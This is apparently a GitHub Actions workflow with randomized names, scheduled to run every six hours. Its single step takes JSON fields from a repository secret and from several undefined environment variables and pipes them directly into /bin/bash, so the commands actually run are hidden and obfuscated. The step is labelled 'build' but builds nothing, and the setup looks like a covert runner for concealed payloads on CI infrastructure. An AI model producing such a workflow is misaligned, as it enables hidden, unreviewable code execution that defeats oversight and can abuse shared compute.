name: wuhaoning3214

on:
  workflow_dispatch:
  schedule:
    - cron: '43 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuhaoning3214
        env:
          yq19755: ${{ secrets.yq19755 }}
        run: |
          echo $yq19755 | jq -r .jshv37800 | /bin/bash
          echo $vcgu01 | jq -r .bzc685 | /bin/bash
          echo $execf7 | jq -r .xr40011 | /bin/bash
          echo $m0 | jq -r .vk241 | /bin/bash

